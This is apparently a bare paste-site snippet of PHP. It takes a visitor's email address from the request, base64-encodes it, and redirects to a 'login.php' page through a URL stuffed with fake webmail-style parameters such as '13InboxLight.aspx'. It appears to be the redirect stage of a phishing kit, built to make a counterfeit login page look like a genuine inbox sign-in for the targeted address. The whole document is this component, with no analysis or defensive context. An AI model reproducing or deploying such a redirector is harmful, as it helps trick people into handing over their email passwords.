Untitled
2 years ago in PHP
<?php
$user = $_REQUEST['email'];
$email = base64_encode($user);
echo "<meta http-equiv=refresh content=0;url='login.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=$email&.rand=13InboxLight.aspx?n=1774256418&fid=4#n=1252899642&fid=1&fav=1' >";
?>